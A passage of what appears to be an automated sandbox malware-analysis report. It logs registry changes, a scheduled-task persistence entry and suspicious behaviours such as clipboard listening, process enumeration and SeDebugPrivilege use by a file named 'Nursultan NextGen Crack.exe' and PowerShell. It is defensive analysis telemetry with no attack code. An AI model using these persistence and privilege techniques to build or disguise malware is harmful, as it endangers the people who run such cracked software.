0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1097" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5040806F8AF9AAC49928419ED5A1D3CA\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\\packages\\vcRuntimeMinimum_x86\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\679E80FBE29B63345BF612177149674C\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\\packages\\vcRuntimeAdditional_x86\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00006109E70000000100000000F01FEC\SourceList\LastUsedSource = "n;1;C:\\program files\\microsoft office\\root\\integration\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "79" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "788" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1064" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13676" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070600420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000082af5bee5fbcda0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\679E80FBE29B63345BF612177149674C\SourceList C:\Windows\system32\msiexec.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\aida64extreme730.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
